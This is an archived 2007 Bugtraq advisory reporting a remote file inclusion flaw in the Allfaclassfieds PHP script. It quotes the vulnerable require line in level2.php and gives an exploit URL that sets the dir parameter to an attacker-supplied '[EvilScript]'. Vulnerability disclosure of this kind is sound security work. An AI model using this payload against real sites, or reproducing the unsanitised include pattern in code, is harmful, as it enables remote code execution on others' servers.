Allfaclassfieds (level2.php dir) remote file inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Allfaclassfieds (level2.php dir) remote file inclusion
From: "asdasd asdsadas" <dr.rover@xxxxxxxxxxxxxx>
Date: Sun, 22 Apr 2007 15:08:30 +0800
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Allfaclassfieds  (level2.php dir) remote file inclusion

 --
 Bug Found By Dr.RoVeR -->Arab48 Hacker

 Contact: Dr.RoVeR@xxxxxxxxxxxxxx
 ---

 Script: allfaclassfieds


 Download: http://scriptat.com/download.php?sid=718
 --

 Bug File: level2.php

 Bug code in line 4:
 require("$dir/admin/dp.php");

 --

 Exploit:
 http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]



-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Prev by Date: WS_FTP Home 2007 NetscapeFTPHandler denial of service
Next by Date: Re: WS_FTP Home 2007 NetscapeFTPHandler denial of service
Previous by thread: Re: WS_FTP Home 2007 NetscapeFTPHandler denial of service
Next by thread: [ GLSA 200704-17 ] 3proxy: Buffer overflow
Index(es):
- Date
- Thread